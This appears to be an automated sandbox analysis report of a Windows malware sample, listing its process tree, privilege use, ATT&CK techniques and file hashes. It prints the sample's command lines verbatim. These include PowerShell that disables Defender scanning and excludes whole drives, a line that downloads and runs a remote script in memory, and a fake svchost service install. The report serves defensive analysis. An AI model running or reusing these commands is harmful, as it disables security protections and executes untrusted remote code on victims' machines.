743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exechrome.exepid process 3616 powershell.exe 3616 powershell.exe 4072 powershell.exe 4072 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe 4768 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeWMIC.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 3616 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeIncreaseQuotaPrivilege 3976 WMIC.exe Token: SeSecurityPrivilege 3976 WMIC.exe Token: SeTakeOwnershipPrivilege 3976 WMIC.exe Token: SeLoadDriverPrivilege 3976 WMIC.exe Token: SeSystemProfilePrivilege 3976 WMIC.exe Token: SeSystemtimePrivilege 3976 WMIC.exe Token: SeProfSingleProcessPrivilege 3976 WMIC.exe Token: SeIncBasePriorityPrivilege 3976 WMIC.exe Token: SeCreatePagefilePrivilege 3976 WMIC.exe Token: SeBackupPrivilege 3976 WMIC.exe Token: SeRestorePrivilege 3976 WMIC.exe Token: SeShutdownPrivilege 3976 WMIC.exe Token: SeDebugPrivilege 3976 WMIC.exe Token: SeSystemEnvironmentPrivilege 3976 WMIC.exe Token: SeRemoteShutdownPrivilege 3976 WMIC.exe Token: SeUndockPrivilege 3976 WMIC.exe Token: SeManageVolumePrivilege 3976 WMIC.exe Token: 33 3976 WMIC.exe Token: 34 3976 WMIC.exe Token: 35 3976 WMIC.exe Token: 36 3976 WMIC.exe Token: SeIncreaseQuotaPrivilege 3976 WMIC.exe Token: SeSecurityPrivilege 3976 WMIC.exe Token: SeTakeOwnershipPrivilege 3976 WMIC.exe Token: SeLoadDriverPrivilege 3976 WMIC.exe Token: SeSystemProfilePrivilege 3976 WMIC.exe Token: SeSystemtimePrivilege 3976 WMIC.exe Token: SeProfSingleProcessPrivilege 3976 WMIC.exe Token: SeIncBasePriorityPrivilege 3976 WMIC.exe Token: SeCreatePagefilePrivilege 3976 WMIC.exe Token: SeBackupPrivilege 3976 WMIC.exe Token: SeRestorePrivilege 3976 WMIC.exe Token: SeShutdownPrivilege 3976 WMIC.exe Token: SeDebugPrivilege 3976 WMIC.exe Token: SeSystemEnvironmentPrivilege 3976 WMIC.exe Token: SeRemoteShutdownPrivilege 3976 WMIC.exe Token: SeUndockPrivilege 3976 WMIC.exe Token: SeManageVolumePrivilege 3976 WMIC.exe Token: 33 3976 WMIC.exe Token: 34 3976 WMIC.exe Token: 35 3976 WMIC.exe Token: 36 3976 WMIC.exe Token: SeDebugPrivilege 4048 powershell.exe Token: SeShutdownPrivilege 984 msiexec.exe Token: SeIncreaseQuotaPrivilege 984 msiexec.exe Token: SeSecurityPrivilege 2608 msiexec.exe Token: SeCreateTokenPrivilege 984 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 984 msiexec.exe Token: SeLockMemoryPrivilege 984 msiexec.exe Token: SeIncreaseQuotaPrivilege 984 msiexec.exe Token: SeMachineAccountPrivilege 984 msiexec.exe Token: SeTcbPrivilege 984 msiexec.exe Token: SeSecurityPrivilege 984 msiexec.exe Token: SeTakeOwnershipPrivilege 984 msiexec.exe Token: SeLoadDriverPrivilege 984 msiexec.exe Token: SeSystemProfilePrivilege 984 msiexec.exe Token: SeSystemtimePrivilege 984 msiexec.exe Token: SeProfSingleProcessPrivilege 984 msiexec.exe Token: SeIncBasePriorityPrivilege 984 msiexec.exe Token: SeCreatePagefilePrivilege 984 msiexec.exe Token: SeCreatePermanentPrivilege 984 msiexec.exe Token: SeBackupPrivilege 984 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
msiexec.exepid process 984 msiexec.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exepowershell.execmd.exeinstall.exemsiexec.exepowershell.exechrome.exemsedge.exesvchost.exedescription pid process target process PID 1460 wrote to memory of 3616 1460 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe powershell.exe PID 1460 wrote to memory of 3616 1460 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe powershell.exe PID 1460 wrote to memory of 4072 1460 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe powershell.exe PID 1460 wrote to memory of 4072 1460 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe powershell.exe PID 3616 wrote to memory of 3976 3616 powershell.exe WMIC.exe PID 3616 wrote to memory of 3976 3616 powershell.exe WMIC.exe PID 3616 wrote to memory of 4048 3616 powershell.exe powershell.exe PID 3616 wrote to memory of 4048 3616 powershell.exe powershell.exe PID 1460 wrote to memory of 4060 1460 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe cmd.exe PID 1460 wrote to memory of 4060 1460 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe cmd.exe PID 4060 wrote to memory of 920 4060 cmd.exe install.exe PID 4060 wrote to memory of 920 4060 cmd.exe install.exe PID 4060 wrote to memory of 920 4060 cmd.exe install.exe PID 920 wrote to memory of 984 920 install.exe msiexec.exe PID 920 wrote to memory of 984 920 install.exe msiexec.exe PID 920 wrote to memory of 984 920 install.exe msiexec.exe PID 2608 wrote to memory of 4400 2608 msiexec.exe MsiExec.exe PID 2608 wrote to memory of 4400 2608 msiexec.exe MsiExec.exe PID 2608 wrote to memory of 4400 2608 msiexec.exe MsiExec.exe PID 4072 wrote to memory of 4768 4072 powershell.exe chrome.exe PID 4072 wrote to memory of 4768 4072 powershell.exe chrome.exe PID 4072 wrote to memory of 4768 4072 powershell.exe chrome.exe PID 4072 wrote to memory of 4768 4072 powershell.exe chrome.exe PID 4768 wrote to memory of 1824 4768 chrome.exe msedge.exe PID 4768 wrote to memory of 1824 4768 chrome.exe msedge.exe PID 4768 wrote to memory of 1824 4768 chrome.exe msedge.exe PID 4768 wrote to memory of 1824 4768 chrome.exe msedge.exe PID 1824 wrote to memory of 5024 1824 msedge.exe powershell.exe PID 1824 wrote to memory of 5024 1824 msedge.exe powershell.exe PID 1824 wrote to memory of 2316 1824 msedge.exe svchost.exe PID 1824 wrote to memory of 2316 1824 msedge.exe svchost.exe PID 116 wrote to memory of 4428 116 svchost.exe wmic.exe PID 116 wrote to memory of 4428 116 svchost.exe wmic.exe PID 116 wrote to memory of 2244 116 svchost.exe wmic.exe PID 116 wrote to memory of 2244 116 svchost.exe wmic.exe PID 116 wrote to memory of 1908 116 svchost.exe wmic.exe PID 116 wrote to memory of 1908 116 svchost.exe wmic.exe PID 116 wrote to memory of 1148 116 svchost.exe wmic.exe PID 116 wrote to memory of 1148 116 svchost.exe wmic.exe PID 116 wrote to memory of 4568 116 svchost.exe wmic.exe PID 116 wrote to memory of 4568 116 svchost.exe wmic.exe PID 116 wrote to memory of 4720 116 svchost.exe wmic.exe PID 116 wrote to memory of 4720 116 svchost.exe wmic.exe PID 116 wrote to memory of 4280 116 svchost.exe powershell.exe PID 116 wrote to memory of 4280 116 svchost.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Add-MpPreference -ExclusionExtension '.exe' -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5024 -
C:\Users\Admin\AppData\Local\svchost\svchost.exeC:\Users\Admin\AppData\Local\svchost\svchost.exe -install5⤵
- Sets service image path in registry
- Executes dropped EXE
PID:2316 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c install.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\install.exeinstall.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIBBDE.tmp4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:984
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E5BD01B1DB0AB92A5BB72FE44CC2ACEF C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4400
-
C:\Users\Admin\AppData\Local\svchost\svchost.exe"C:\Users\Admin\AppData\Local\svchost\svchost.exe" --meshServiceName="Microsoft"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:4428
-
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:2244
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:1908
-
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:1148
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:4568
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4720
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:4280
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36.6MB
MD56d9b5a3b75da266db5c237b0ac70b7f9
SHA19ce4aa208974b299ce0abeaf043740616f4f0b02
SHA256d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b
SHA512fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d
-
Filesize
298KB
MD5684f2d21637cb5835172edad55b6a8d9
SHA15eac3b8d0733aa11543248b769d7c30d2c53fcdb
SHA256da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
SHA5127b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36.6MB
MD5979ce82b2ea35a92fae6a60c6c3e3791
SHA18d260eea0151ee7a6aae88eb2e9015d5efb2603b
SHA256be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca
SHA512ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724
-
Filesize
5.3MB
MD529304e42dc26d1276ca93a9c013599a4
SHA165437796133c2704d20757c99b768ffd915d1502
SHA25683e75c4b57f3a255ec9efcdbda027a5b9577a993359c9a21946d5bec45924dd9
SHA512fa0e66a941030fc9bde0b84e98645f04e3405fe76e539e214f1c1069661ca699e93d245a56fe37d4eec36fa13710bcc1b6c1373d9a0f9a0656ba233ee2aae8ca
-
Filesize
22KB
MD590f91efb0b6cc632ea6b2bb3a6d5fb40
SHA1e46a39e7252e086f34d64c3d720442cd325de506
SHA2567db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9
SHA512f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928